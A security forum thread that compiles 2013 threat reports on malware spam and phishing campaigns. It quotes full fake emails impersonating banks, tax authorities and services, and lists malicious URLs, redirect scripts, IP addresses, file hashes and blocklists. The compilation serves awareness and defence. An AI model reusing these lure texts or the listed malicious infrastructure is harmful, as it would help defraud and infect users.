Review the information below and contact your Relationship Manager if you have questions, or make immediate arrangements to fund the account. If funds are not received by 09/24/2013 03:00 pm PT, the file may not be processed.
Please view the attached file for more details on this transaction.
Any email address changes specific to the Wire Transfer Service should be directed to Treasury Management Client Services at 1-800-AT-WELLS (1-800-289-3557).
Event Message ID: S203-8767457
Date/Time Stamp: Tue, 24 Sep 2013 10:54:32 -0700 ...

Attached is a ZIP file called INTL_Wire_Report-09242013.zip which in turn contains a malicious executable INTL_Wire_Report-09242013.exe (note the date in encoded into the filename). The VirusTotal results show a so-so detection rate of 9/48*... network traffic to ta3online .org on 108.168.164.202 (Softlayer, US) which is some sort of compromised legitimate site. Blocking EXE-in-ZIP files at you network perimeter is absolutely the best way of avoid malware attacks like this."
* https://www.virustotal.com/en/file/cb920789573b15518b19cc3b413ebe6f1dada6c8c15f841e51d9369b85e285a1/analysis/1380058931/
___

Threat Outbreak Alerts
- http://tools.cisco.com/security/center/threatOutbreak.x?i=77
Fake Wire Transfer Failure Notification Email Messages - 2013 Sep 24
Fake Payment Information Email Messages - 2013 Sep 24
Fake Unpaid Debt Invoice Email Messages - 2013 Sep 24
Email Messages with Malicious Attachments - 2013 Sep 24
Email Messages with Malicious Attachments - 2013 Sep 24
Fake Shipping Order Information Email Messages - 2013 Sep 24
Fake Picture Delivery Email Messages - 2013 Sep 24
Fake Account Payment Notification Email Messages - 2013 Sep 24
Fake Fax Document Delivery Email Messages - 2013 Sep 24
Fake Media File Sharing Email Messages - 2013 Sep 24
Fake Bank Payment Information Email Messages - 2013 Sep 24
Fake Package Delivery Failure Notification Email Messages - 2013 Sep 24
Malicious Personal Pictures Attachment Email Messages - 2013 Sep 24
(More detail and links at the cisco URL above.)

:mad: :fear::fear:

AplusWebMaster
2013-09-26, 00:52
FYI...

Fake Intuit SPAM / Invoice_3056472.zip
- http://blog.dynamoo.com/2013/09/intuit-spam-invoice3056472zip.html
25 Sep 2013 - "It's an email from a company I have no dealings with, with a ZIP file that contains an EXE file! What could possible go wrong? Oh..
Date: Wed, 25 Sep 2013 09:37:48 -0600 [11:37:48 EDT]
From: Lewis Muller [Lewis.Muller @ intuit .com]
Subject: FW: Invoice 3056472
Your invoice is attached.
Sincerely,
Lewis Muller
This e-mail has been sent from an automated system. PLEASE DO NOT REPLY...

The attachment is Invoice_3056472.zip which in turn contains a malicious file Invoice_092513.exe which has a pretty low VirusTotal detection rate of just 4/48*... the usual sort of badness, including a call home to gidleybuilders .com on 78.157.201.219 (UK Dedicated Servers Ltd, UK) which we also saw being used in an attack last week**. Two compromised domains in a week seems a bit more than a coincidence... legitimate domains are also on that same server..."
* https://www.virustotal.com/en/file/ab746f564e12257dc839c64b4d04a78979a2039c134c18dff3b6f487eef88607/analysis/1380130529/

** http://blog.dynamoo.com/2013/09/adp-spam-adp831290760091zip.html
___

Fake Phish - FW: Invoice 8428502
- http://security.intuit.com/alert.php?a=87
9/25/2013 - "Here is a copy of the phishing email people are receiving. Be sure -not- to click any links in the email.

Please be advised that that the attachment (Invoice_092513.exe) received with this email was removed in accordance with the Assante Virus policy. If you are aware of the contents of this attachment and you require it for business reasons please contact the IT Helpdesk (its@assante.com OR 888 955 8886). Please contact the sender if you are unsure of the contents or purpose for the attachment.
Your invoice is attached.
Sincerely,
Cliff Jeffers

This is the end of the -fake- email..."
___

Fake AICPA SPAM / children-bicycle .net
- http://blog.dynamoo.com/2013/09/aicpa-spam-children-bicyclenet.html
25 Sep 2013 - "This fake AICPA spam leads to malware on the domain children-bicycle .net:
From: Reggie Wilkins [blockp12@ clients.aicpa .net]
Date: 25 September 2013 15:03
Subject: Your accountant license can be cancelled.
You're receiving this email as a Certified Public Accountant and a member of AICPA.
Having trouble reading this email? View it in your browser.
AICPA logo
Cancellation of Accountant status due to tax return fraud allegations
Valued accountant officer,
We have received a complaint about your recent participation in tax return infringement for one of your employers. According to AICPA Bylaw Subsection 730 your Certified Public Accountant license can be withdrawn in case of the occurrence of filing of a false or fraudulent tax return for your client or employer.
Please familiarize yourself with the notification below and provide your feedback to it within 14 days. The failure to do so within this term will result in cancellation of your CPA license.
Complaint.pdf
The American Institute of Certified Public Accountants...

Screenshot: https://lh3.ggpht.com/-bGGHCaxMLis/UkL6RAFRnFI/AAAAAAAAB_c/04BZbMByhJ8/s1600/aicpa.png

... The link in the email goes to a legitimate -hacked- site and then on to a malware payload at [donotclick]www.aicpa.org.children-bicycle .net/news/aicpa-all.php (report here*).. but only if the visitor is running Windows (more of which in a moment). The domain children-bicycle .net is registered with fake WHOIS details and the pattern of the domain mark it out as belonging to the Amerika gang... The payload is hosted on the following IP addresses (all also listed here**):
24.111.103.183 (Midcontinent Media, US)
109.71.136.140 (OpWan, France)
184.82.233.29 (Network Operations Center, US)
As I mentioned, the code detects the visitor's OS and only sends the victim to the exploit kit if they are running Windows, others end up at the genuine aicpa .org website:
> https://lh3.ggpht.com/-9WjcD-F-6Hk/UkL9_bvLrVI/AAAAAAAAB_o/5D0WOTEyMMU/s1600/aicpa-code.png
Recommended blocklist:
24.111.103.183
109.71.136.140
184.82.233.29 ..."
* http://urlquery.net/report.php?id=5941489

** http://blog.dynamoo.com/2013/09/malware-sites-to-block-2492013.html
___

6rf .net and something evil on 198.50.225.121, 85.25.108.10 and 178.33.208.211
- http://blog.dynamoo.com/2013/09/6rfnet-and-something-evil-on.html
25 Sep 2013 - "Here are a couple of IPs serving exploit kits.. the case in question is a legitimate site that loads code from 6rf .net and this in turn loads an exploit kit from [donotclick]yandex.ru.sgtfnregsnet.ru and [donotclick]l451l.witnessvacant .biz. The .biz domain in this case is hosted on 198.50.225.121 (OVH, Canada) along with subdomains... That IP hosts various exploit kits* and is suballocated to a Russian customer... Those domains are also associated with some other OVH IPs of 178.33.208.211 and 46.105.166.99 (OVH, France). In both those cases, the OVH range is delegated to another Russian customer... But that's not the only infection that 6rf .net is punting, as there is another malicious domain of [donotclick]yandex .ru.sgtfnregsnet .ru in use (report here**) hosted on 85.25.108.10 (Intergenia AG, Germany). There appears to be at least one other malicious domain on the same server (googlebot .ru ***) which is also serving up an exploit kit... It looks like other malware sites have been hosted on that IP in the past, so I would recommend blocking that too, giving this recommended blocklist:
46.105.166.99
85.25.108.10
178.33.208.211
198.50.225.121
6rf .net ..."
(More listed at the dynamoo URL aqbove.)
* http://urlquery.net/search.php?q=198.50.225.121&type=string&start=2013-09-10&end=2013-09-25&max=50

** http://urlquery.net/report.php?id=5939386

*** http://urlquery.net/report.php?id=5924098

:mad: :fear:

AplusWebMaster
2013-09-26, 15:39
FYI...

Something evil on 91.231.98.149 and boats .net
- http://blog.dynamoo.com/2013/09/something-evil-on-9123198149-and.html
26 Sep 2013 - "This injection attack* on boats .net caught my attention, a nasty bit of injected code pointing to a (now suspended) domain called gamelikeboards .biz hosted on 91.231.98.149 (Neohost.net, Ukraine). Basically, the victim website has code injected pointing to [donotclick]gamelikeboards .biz/_cp/crone/ which cannot be anything good. What do we know about gamelikeboards.biz? As luck would have it, the domain was suspended by the registrar... A look at 91.231.98.0/24 indicates a mix of spammy sites plus a number of local Russian and Ukranian sites... I don't know what the payload is, but the IP address was also used in this recent malware attack**. The IP and domains are definitely malicious, and I would recommend the following blocklist:
91.231.98.149
eschewsramping .biz
gamelikeboards .biz
sixteenups .biz
sorelyzipmagics .biz
technicaltutoring .biz
zarazagorakakaxx1 .org
zarazagorakakaxx2 .com
* [url]http://urlquery.net/report.php?id=5960880

** https://malwr.com/analysis/YjQ1ZmIyNDYyMzQ1NDdiYjliODBhZTU2NDU2NDgzNmE/

Added: it looks like this site has been compromised before*** ..."
*** http://news.softpedia.com/news/Outdoor-Network-Starts-Notifying-Customers-After-Boats-net-and-Partzilla-com-Hack-382161.shtml
___

Print A Tree, Pop An Ad
- http://www.threattracksecurity.com/it-blog/print-tree-pop-ad/
Sep 26, 2013 - "... We first noticed this one as part of a larger Installcore bundler from a pop up on a “free video” site:
> http://www.threattracksecurity.com/it-blog/wp-content/uploads/2013/09/treeprint5.png
...
> http://www.threattracksecurity.com/it-blog/wp-content/uploads/2013/09/treeprint6.jpg
Quite what our chosen subject matter has to do with videos I’ve no real idea, but never let relevance detract from an Adware bundle. Here it is during the main install of “FLV Player Setup”, and it is called “Print-A-Tree”.
> http://www.threattracksecurity.com/it-blog/wp-content/uploads/2013/09/treeprint2.jpg
... Some of the other programs installed from the Installcore bundle included Web Connect (Yontoo variant), Bonanza Deals and O-to-Lyrics... This is where things go horribly wrong, because not only do you have ads injected onto numerous websites, you also end up with pop-ups which often lead to additional installs (with additional Adware!)... The pop-up ad promotes a web browser which will offer up more adware at install, to sit alongside whatever applications you happen to have on board from the first bundle... You can see more about the original bundler file over at VirusTotal*, which currently has it pegged at 8/41..."
* https://www.virustotal.com/en/file/4183c49f0a97ebbec42ea3c928e36624674704f4d4a2566d7c40c22a9a17055f/analysis/1380126410/
File name: FlvPlayerSetup.exe_
Detection ratio: 8/41 ...
___

Threat Outbreak Alerts
- http://tools.cisco.com/security/center/threatOutbreak.x?i=77
Fake Xerox Scan Attachment Email Messages - 2013 Sep 26
Fake Package Delivery Invoice Notification Email Messages - 2013 Sep 26
Fake Account Payment Notification Email Messages - 2013 Sep 26
Fake Package Delivery Failure Notification Email Messages - 2013 Sep 26
Fake Sales Receipt Notification Email Messages - 2013 Sep 26
Fake Product Order Email Messages - 2013 Sep 26
Fake Voice Messages Delivery Email Messages - 2013 Sep 26
Fake Electronic Payment Cancellation Email Messages - 2013 Sep 26
Fake Purchase Order Request Email Messages - 2013 Sep 26
Fake Product Requirements List Email Messages - 2013 Sep 26
Fake Product Sample Request Email Messages - 2013 Sep 26
Blank Email Messages with Malicious Attachments - 2013 Sep 26
Fake Financial Document Delivery Email Messages - 2013 Sep 26
(More detail and links at the cisco URL above.)

:mad::mad:

AplusWebMaster
2013-09-27, 20:13
FYI...

Fake Facebook SPAM / directgrid .org
- http://blog.dynamoo.com/2013/09/facebook-you-have-new-notifications.html
27 Sep 2013 - "This fake Facebook spam leads to malware on directgrid .org:
Date: Fri, 27 Sep 2013 16:22:58 +0300 [09:22:58 EDT]
From: Facebook [notification+W85BNFWX @facebookmail .com]
Subject: You have 21 friend suggestions, 11 friend requests and 14 photo tags
facebook
You have new notifications.
A lot has happened on Facebook since you last logged in. Here are some notifications
you've missed from your friends.
3 messages
11 friend requests
21 friend suggestions
14 photo tags
View Notifications
Go to Facebook ...

Screenshot: https://lh3.ggpht.com/-7H6j4ml6nRk/UkWZHoxgKnI/AAAAAAAACAA/QM-UWgx5SDg/s1600/facebook2.png

The link in the email goes through a legitimate (but hacked) site and then loads one of the following three scripts:
[donotclick]3dbrandscapes .com/starker/manipulator.js
[donotclick]dtwassociates .com/marry/sullies.js
[donotclick]repairtouch .co .za/lollypops/aquariuses.js
This leads to a malware landing page hosted on a -hijacked- GoDaddy domain at [donotclick]directgrid .org/topic/lairtg-nilles-slliks.php hosted on 50.116.10.71 (Linode, US) where there are a number of other hijacked domains...
Recommended blocklist:
50.116.10.71 ..."
(More listed at the dynamoo URL above.)

- https://www.virustotal.com/en/ip-address/50.116.10.71/information/

:fear::mad:

AplusWebMaster
2013-09-30, 18:55
FYI...

Fake IRS SPAM / oooole .org
- http://blog.dynamoo.com/2013/09/irs-invalid-file-email-reminder-spam.html
30 Sep 2013 - "This fake IRS spam leads to malware on oooole .org:
Date: Mon, 30 Sep 2013 03:44:12 -0800 [07:44:12 EDT]
From: "Fire@irs.gov" [burbleoe9@ irs .org]
Subject: Invalid File Email Reminder
9/30/2013
Valued Transmitter,
We few weeks agoreceived your electronic file(s) of information returns; but, the file(s) contained errors. As of the date of this email, we have not received a good replacement file. If we do not receive the replacement file within the allowed time from your transmission, late filing payoff may be applied. For further clarification on sending a timely filed replacement, please see Publication 1220, Part B, Section 7.03. The following is a list of your incorrect file(s) that need to be replaced:
Filename # of Times
Email Has
Been Sent Tax
Year
ORIG.62U55.2845 2 2012...

The link in the email goes through a legitimate -hacked- site and then -redirects- through one of the following three scripts:
[donotclick]savingourdogs .com/boneheads/meditatively.js
[donotclick]solaropti.manclinux3.ukdns .biz/resonators/sunbonnet.js
[donotclick]polamedia .se/augusts/fraudulence.js
The next step is a malware landing page on a hijacked GoDaddy domain at [donotclick]oooole .org/topic/latest-blog-news.php hosted on 75.98.172.238 (A2 Hosting, US) along with several other hijacked domains...
Recommended blocklist:
75.98.172.238 ..."

- https://www.virustotal.com/en/ip-address/75.98.172.238/information/
___

Fake Wells Fargo SPAM - malicious ZIP file
- http://blog.dynamoo.com/2013/09/wells-fargo-important-documents-spam.html
30 Sep 2013 - "This fake Wells Fargo spam comes with a malicious attachment:
Date: Mon, 30 Sep 2013 11:54:15 -0600 [13:54:15 EDT]
From: Bryon Faulkner [Bryon.Faulkner@ wellsfargo .com]
Subject: Important Documents
Please review attached documents.
Bryon Faulkner
Wells Fargo Advisors
817-527-6769 office
817-380-3921 cell Bryon.Faulkner@ wellsfargo .com
Investments in securities and insurance products are:
NOT FDIC-INSURED/NO BANK-GUARANTEES/MAY LOSE VALUE
Wells Fargo Advisors, LLC is a nonbank affiliate of Wells Fargo & Company, Member
FINRA/SIPC. 1 North Jefferson, St. Louis, MO 63103 ...

The attached document is starts with "Documents_" and then has the first part of the recipient's email address as part of the filename. Or that's the way it is meant to work because in practice it will probably be a different recipient in the same domain. Inside is an executable file with the date encoded into the filename (in this case Documents_09302013.exe). The executable file is (obviously) malware, and has a VirusTotal detection rate of just 3/48*... attempted connection to the site demandtosupply .com on 84.22.177.37 (ioMart, UK) which is a server spotted in a similar attack a few weeks ago**. Unfortunately, where more than one domain on a server is compromised then it looks like the bad guys have complete control of the server and can do what they like. There are a number of legitimate sites (including one IT security company) on this box... so exercise caution if deciding to block them.
Recommended blocklist:
84.22.177.37
demandtosupply .com
ce-cloud .com"
* https://www.virustotal.com/en/file/32845402bb571205b36923c74f3c67ea68ca30efe2ceead4118183437b4845da/analysis/1380564661/

** http://blog.dynamoo.com/2013/09/scanned-document-attached-spam.html

- https://www.virustotal.com/en/ip-address/84.22.177.37/information/

:fear: :mad:

AplusWebMaster
2013-10-01, 18:42
FYI...

Fake AMEX phish ...
- http://threattrack.tumblr.com/post/62810863752/american-express-credentials-phish
Oct 1, 2013 - "Subjects Seen:
Fraud Alert : Irregular Card Activity
Typical e-mail details:
Dear Customer,
We detected irregular card activity on your American Express
Check Card on 1st October, 2013.
As the Primary Contact, you must verify your account activity before you can
continue using your card, and upon verification, we will remove any restrictions
placed on your account.
To review your account as soon as possible please.
Please click on the link below to verify your information with us:
americanexpress.com
If you account information is not updated within 24 hours then your ability
to access your account will be restricted.
We appreciate your prompt attention to this important matter.

Malicious URLs
kaindustries.comcastbiz .net/boulevards/index.html
theswordcoast.awardspace .com/catalepsy/index.html
i37raceway .com/hovers/index.html
pizzapluswindsor .ca/americanexpress/

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/f9f15d03e1e7ddf46f7964a8469f9f67/tumblr_inline_mtzvalp01I1r6pupn.png
___

Fake NACHA SPAM - malware on thewalletslip .com
- http://blog.dynamoo.com/2013/10/fake-nacha-spam-leads-to-malware-on.html
1 Oct 2013 - "This fake NACHA spam leads to malware on thewalletslip .com:
Date: Tue, 1 Oct 2013 15:05:56 +0330 [07:35:56 EDT]
From: ACH Network [markdownfyye396@ nacha .org]
Subject: Your ACH transfer
The ACH processing (ID: 428858072307), recently was made from your bank account (by you or any other person), was rejected by the other financial institution.
Aborted transfer
ACH transfer ID: 428858072307
Reason of Cancellation Notice information in the report below
Transaction Report View Report 428858072307
About NACHA ...

Screenshot: https://lh3.ggpht.com/-Fs6-J6CBRpE/UkrNz0uc4JI/AAAAAAAACAY/0P9Qc8C6gK0/s1600/nacha.png

The link in the email goes through a legitimate -hacked- site and then runs one of three scripts:
[donotclick]theodoxos .gr/hairstyles/defiling.js
[donotclick]web29.webbox11.server-home .org/volleyballs/cloture.js
[donotclick]www.knopflos-combo .de/subdued/opposition.js
Then the victim is directed to a malware landing page at [donotclick]thewalletslip .com/topic/latest-blog-news.php and if you follow this blog regularly then you will not be at all surprised to find that it has been hijacked from GoDaddy... It is hosted on 75.98.172.238 (A2 Hosting, US) which is the same server spotted yesterday*."
Recommended blocklist:
75.98.172.238 ..."
* http://blog.dynamoo.com/2013/09/irs-invalid-file-email-reminder-spam.html

- https://www.virustotal.com/en/ip-address/75.98.172.238/information/
___

Apple spikes as Phishing Target
- http://blog.trendmicro.com/trendlabs-security-intelligence/apple-spikes-as-phishing-target/
Oct 1, 2013 - "... Apple is now the most valuable brand in the world. One party that would agree: cybercriminals, who are now targeting Cupertino in increasing numbers. Earlier in the year, the number of identified Apple phishing sites would only be in the hundreds per month, as seen in the chart below:
Number of identified Apple-related phishing sites
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2013/09/apple-graph.png
Some cases of these Apple-related threats just use Apple as social engineering bait. For example, here, the need to “verify” one’s Apple products or services is used to phish email services:
Phishing site
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2013/09/apple-phish-2.gif
... Apple ID itself is now being targeted for theft. For users of all Apple products – whether they be Macs, iOS devices, or just the iTunes store – the Apple ID is a key ingredient in how they use these products. For example, it can be used to control the data stored in your iCloud account, make purchases of both music and apps, and even manage your iOS or Mac device. Not only that, users from all over the world are being targeted. For example, this phishing site is in French:
Apple ID phishing site
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2013/09/apple-phish-france-4.gif
... It would appear that cybercriminals are using Apple-related rumors as a gauge of potential interest from users/victims and increase the number of their attacks as needed. This growth in Apple-related threats highlights how Apple users, far from being safe, are continuously targeted by threats today as well..."
___

Pinterest Facebook Friend Spam
- http://threattrack.tumblr.com/post/62823818697/pinterest-facebook-friend-spam
Oct 1, 2013 - "Subjects Seen:
Your Facebook friend <removed> joined Pinterest
Typical e-mail details:
Your Facebook friend <removed> just joined Pinterest. Help welcome <removed> to the community!

Malicious URLs
ats.webd .pl/caskets/index.html
theodoxos .gr/hairstyles/defiling.js
web29.webbox11.server-home .org/volleyballs/cloture.js
knopflos-combo .de/subdued/opposition.js
pizzapluswindsor .ca/topic/latest-blog-news.php

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/bf61cd5a0995ac279cf8940470bf8ae5/tumblr_inline_mu050u7D5p1r6pupn.png
___

Tens of thousands of fake Twitter accounts passed off and sold as 'followers'
- https://www.virusbtn.com/blog/2013/09_20.xml
20 Sep 2013
___

Threat Outbreak Alerts
- http://tools.cisco.com/security/center/threatOutbreak.x?i=77
Email Messages with Malicious Attachments - 2013 Oct 01
Fake Commissions Statement Notification Email Messages - 2013 Oct 01
Fake Product Order Request Email Messages - 2013 Oct 01
Fake Purchase Order Notification Email Messages - 2013 Oct 01
Fake Product Order Delivery Information Email Messages - 2013 Oct 01
Fake Multimedia Message Delivery Email Message - 2013 Oct 01
Fake Product Order Email Messages - 2013 Oct 01
Fake Bank Payment Notification Email Messages - 2013 Oct 01
Fake Court Document Email Messages - 2013 Oct 01
Fake Document Filing Notification Email Messages - 2013 Oct 01
Fake Debt Collection Notification Email Messages - 2013 Oct 01
Fake Account Payment Notification Email Messages - 2013 Oct 01
Fake Product Purchase Order Email Messages - 2013 Oct 01
Fake Product Specification Request Email Messages - 2013 Oct 01
Fake Bank Payment Transfer Notification Email Messages - 2013 Oct 01
Fake Shipment Invoice Email Messages - 2013 Oct 01
Fake Payment Information Email Messages - 2013 Oct 01
Blank Email Messages with Malicious Attachments - 2013 Oct 01
(More detail and links at the cisco URL above.)

:fear::mad::fear:

AplusWebMaster
2013-10-02, 14:24
FYI...

Fake T-Mobile message emails lead to malware
- http://www.webroot.com/blog/2013/10/02/t-mobile-mms-message-arrived-themed-emails-lead-malware/
Oct 2, 2013 - "A circulating malicious spam campaign attempts to trick T-Mobile customers into thinking that they’ve received a password-protected MMS. However, once gullible and socially engineered users execute the malicious attachment, they automatically compromise the confidentiality and integrity of their PCs, allowing the cybercriminals behind the campaign to gain complete control of their PCs. Detection rate for the spamvertised sample – MD5: 5d69a364ffa8d641237baf4ec7bd641f – * W32/Trojan.XTWU-6193; TR/Sharik.B; Trojan.DownLoader9.22851
Once executed, the sample phones back to networksecurityx.hopto .org – 69.65.19.117 ... subdomains are also known to have phoned back to the same IP in that past... malicious MD5s are also known to have phoned back to the same domain/IP in the past..."
* https://www.virustotal.com/en/file/a9e3c6ff238cd1e4a5a2d3312bfad59091c25698e6c072623af279a58ebbe254/analysis/1379599644/
___

Fake Facebook Mobile Page Steals Credit Card Details
- http://blog.trendmicro.com/trendlabs-security-intelligence/fake-facebook-mobile-page-steals-credit-card-details/
Oct 1, 2013 10:28 pm (UTC-7) - "... a mobile phishing page that looks very similar to the official Facebook mobile page. However, looking closely into the URL address, there are noticeable differences. The real Facebook page is located at https://m.facebook.com/login and has the lock icon to show that the page is secured.
Fake vs. legitimate Facebook mobile page
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2013/09/Facebook-phishingvsreal-pag.gif
This page tries to steal more than Facebook credentials. Should users actually try to log in, the page then prompts users to choose a security question. This may sound harmless, but these same security questions might be used across several different sites, and can compromise your security as well.
Fake Facebook security page
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2013/09/fake-facebook-security-page.gif
Once users are done, they are led to another page, this time asking for their credit card details.
Page asking for credit card details
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2013/09/fake-facebook-page-creditca.gif
In cases like these, users should always be careful and double-check the URLs of sites they are entering personal information into, particularly those that claim to belong to a particular service. In addition, Facebook does -not- ask for a user’s credit card information unless they are making a purchase..."
___

"microsoft support" calls - now with ransomware
- https://isc.sans.edu/diary.html?storyid=16703
Last Updated: 2013-10-02 04:16:32 UTC - "Most of us are familiar with the "microsoft support" call. A phone call is received, the person states they are from "microsoft support" and they have been alerted that your machine is infected. The person will assist you by having you install a remote desktop tool such as teamviewer or similar (we have seen many different versions). Previously they would install software that would bug you until you paid the "subscription fee". As the father of a friend found out the other day, when he received a call. They now install -ransomware- which will lock the person out of their computer until a fee has been been paid. In this instance it was done quite early in the "support" call so even disconnecting when smelling a rat it was too late. The ransomware itself looks like it replaced some start up parameters to kick in the lockout rather than encrypting the drive or key elements of the machine. However for most users that would be enough to deny access. So in the spirit of Cyber Security Awareness Month make this month one where you let your non-IT friends and family know two things. Firstly, BACKUP YOUR STUFF. Secondly, tell them "when you receive a call from "microsoft support", the correct response is to hang up."
___

Fake Staples SPAM leads to malware on tootle .us
- http://blog.dynamoo.com/2013/10/fake-staples-spam-leads-to-malware-on.html
2 Oct 2013 - "This fake Staples spam leads to malware on a site called tootle .us:
Date: Wed, 2 Oct 2013 08:40:11 -0500 [09:40:11 EDT]
From: support@ orders.staples .com
Subject: Staples order #: 1353083565
Thank you for shopping Staples.
Here's what happens next:
Order No.:1353083565
Customer No.:1278823232 Method of Payment:Credit or Debit Card
Track order: Track your order
Delivery Address:
Caleb Lewis
41 COMMERCE ST
GREENFIELD WA 092980135
Item1 Qty. Subtotal
DELL 1320 BLACK TONER
Item No.:744319Price:$60.38/each
Expected delivery:10/4/2013byUPS 2 $125.26
Item2 Qty. Subtotal
DELL RY854 CYAN TONER
Item No.:717860Price:$61.87/each
Expected delivery:10/4/2013byUPS 2 $124.03
Subtotal:: $243.59
Delivery: FREE
Tax: $17.66
Total: $250.35
Your order is subject to review ...

Screenshot: https://lh3.ggpht.com/-q6p692ui0yA/UkwxpO-DKdI/AAAAAAAACBA/jtONVL3tAfI/s1600/staples.png

The link in the email goes to a legimate (but hacked site) and then attempt to load one of the following three scripts:
[donotclick]algmediation .org/inventory/symphony.js
[donotclick]apptechgroups .net/katharine/bluejacket.js
[donotclick]ctwebdesignshop .com/marquetry/bucket.js
From there the victim is redirected to a malware landing page at [donotclick]tootle .us/topic/latest-blog-news.php hosted on 23.92.22.75 (Linode, US) which is yet another -hijacked- GoDaddy domain (there are some more on this server...)..."
Recommended blocklist:
23.92.22.75
tootle .us ..."

- https://www.virustotal.com/en/ip-address/23.92.22.75/information/

:fear::mad:

AplusWebMaster
2013-10-03, 19:57
FYI...

Fake Amazon SPAM - uses email address harvested from Comparethemarket .com
- http://blog.dynamoo.com/2013/10/fake-amazon-spam-uses-email-address.html
3 Oct 2013 - "This fake Amazon spam was sent to an email address only used for the UK price comparison site Comparethemarket .com.
From: Amazon.com [ship-confirm@ amazon .com]
Reply-To: "Amazon.com" [ship-confirm@ amazon .com]
Date: 3 October 2013 15:43
Subject: Your Amazon.com order of "Canon EOS 60D DSLR..." has shipped!
Amazon .com
Kindle Store
| Your Account | Amazon.com
Order Confirmation
Order #159-2060285-0376154 ...

Screenshot: https://lh3.ggpht.com/-c8R7xg-gpdY/Uk2X8G-KMAI/AAAAAAAACB4/RIr-Fimvkxs/s1600/amazon.png

How the email address was extracted from Comparethemarket.com is not known. The link in the email goes through a legitimate hacked site and then runs one of the following three scripts:
[donotclick]berkahabadi .de/unclear/unsettle.js
[donotclick]sigmarho.zxq .net/ragas/sextant.js
[donotclick]wni9e7311.homepage.t-online .de/creel/eccentrically.js
This redirects the victim to a malware page at [donotclick]globalrealty-nyc .info/topic/latest-blog-news.php which is a hijacked GoDaddy domain hosted on 96.126.103.252 (Linode, US). This is currently the only domain that I can detect on this computer, but the usual pattern is that there will be several others so blocking that IP address would be prudent.
Recommended blocklist:
96.126.103.252 ..."

- https://www.virustotal.com/en/ip-address/96.126.103.252/information/

USPS Express Services Spam
- http://threattrack.tumblr.com/post/62995873638/usps-express-services-spam
Oct 3, 2013 - "Subjects Seen:
USPS - Your package is available for pickup ( Parcel <random> )
USPS - Missed package delivery
Typical e-mail details:
The courier company was not able to deliver your parcel by your address.
Cause: Error in shipping address.
Label: <random>
Print this label to get this package at our post office.
Please attention!
For mode details and shipping label please see the attached file.
Please do not reply to this e-mail, it is an unmonitored mailbox!
Thank you,
USPS Logistics Services.

Malicious File Name and MD5:
USPS_Label_<random>.zip (43BA7C2530EF2F69DEF845FE5E10C6C7)
USPS_Label_<date>.exe (7EAC25BFC4781CA44C5D991115AAF0B4)

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/9b894dabc36a9a3ca56b389f8998f4e3/tumblr_inline_mu3kgsMMFH1r6pupn.png

:fear: :mad:

AplusWebMaster
2013-10-04, 17:19
FYI...

Fake Dropbox SPAM - leads to malware on adelect .com
- http://blog.dynamoo.com/2013/10/fake-dropbox-spam-leads-to-malware-on.html
4 Oct 2013 - "This fake Dropbox spam leads to malware:
Date: Fri, 4 Oct 2013 16:24:30 +0330 [08:54:30 EDT]
From: Dropbox [no-reply@ dropboxmail .com]
Subject: Please update your Expired Dropbox Password
Hi [redacted].
We noticed that you recently tried to login in to Dropbox with a password that you haven't changed more than 90 days. Your old password has expired and you'll need to create a new one to log in.
Please visit the page to update your password
Reset Password
Thanks!
- The Dropbox Team

Screenshot: https://lh3.ggpht.com/-8446bMdKtno/Uk6__aJc2AI/AAAAAAAACCM/mnPJHVUoqbE/s1600/dropbox.png

The link in the email goes through a legitimate hacked site and then on to a set of three scripts:
[donotclick]12.158.190.75 /molls/smudgier.js
[donotclick]freetraffic2yourweb .com/palermo/uneconomic.js
[donotclick]www.bathroomchoice .com/huntsmen/bestsellers.js
From there the victim is delivered to a malware landing page at [donotclick]adelect .com/topic/latest-blog-news.php which follows a predictable pattern of being a hijacked GoDaddy domain hosted on 66.150.155.210 (Nuclear Fallout Enterprises, US). There are some other hijacked domains on this same server..."
Recommended blocklist:
66.150.155.210
wrightleasing .com
renewalbyandersendayton .com
adelect .com
12.158.190.75
freetraffic2yourweb .com
www .bathroomchoice .com"

- https://www.virustotal.com/en/ip-address/66.150.155.210/information/

:fear: :mad:

AplusWebMaster
2013-10-07, 22:21
FYI...

Fake National Bankruptcy Services SPAM
- http://threattrack.tumblr.com/post/63378601795/national-bankruptcy-services-spam
Oct 7, 2013 - "Subjects Seen:
6253-9166
Typical e-mail details:
Please see the attached Iolta report for 6253-9166.
We received a check request in the amount of $19,335.05 for the above referenced file. However, the attached report reflects a $0 balance. At your earliest convenience, please advise how this request is to be funded.
Thanks.
Milton_Forrest *
Accounts Payable
National Bankruptcy Services, LLC

Malicious File Name and MD5:
6253-9166.zip (47E464919165F040B03160BAA38FD5E3)
report_<date>.exe (0798687A993B98EBF5E87A6F78311F32)

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/de9cee914246610c515325efaea015fa/tumblr_inline_mub2myCgf21r6pupn.png
___

Threat Outbreak Alerts
- http://tools.cisco.com/security/center/threatOutbreak.x?i=77
Fake Account Complaint Resolution Document Email Messages - 2013 Oct 07
Fake Payment Receipt Notification Email Messages - 2013 Oct 07
Fake Payment Confirmation Notification Email Messages - 2013 Oct 07
Fake Account Payment Notification Email Messages - 2013 Oct 07
Fake Commissions Invoice Email Messages - 2013 Oct 07
Fake Hotel Reservation Confirmation Email Messages - 2013 Oct 07
Fake Product Order Email Messages - 2013 Oct 07
Fake Bank Payment Transfer Notification Email Messages - 2013 Oct 07
Fake Financial Document Email Messages - 2013 Oct 07
Malicious Personal Pictures Attachment Email Messages - 2013 Oct 07
Fake Shipping Notification Email Messages - 2013 Oct 07
Fake Document Attachment Email Messages - 2013 Oct 07
Fake Payment Confirmation Email Messages - 2013 Oct 07
Fake Product Quote Request Email Messages - 2013 Oct 07
Fake Electronic Payment Cancellation Email Messages - 2013 Oct 07
Fake Bank Account Details Inquiry Email Messages - 2013 Oct 07
Fake Personal Picture Sharing Notification Email Messages - 2013 Oct 07
Fake Portuguese Personal Picture Notification Email Messages - 2013 Oct 07
Fake Order Shipment Tracking Information Email Messages - 2013 Oct 07
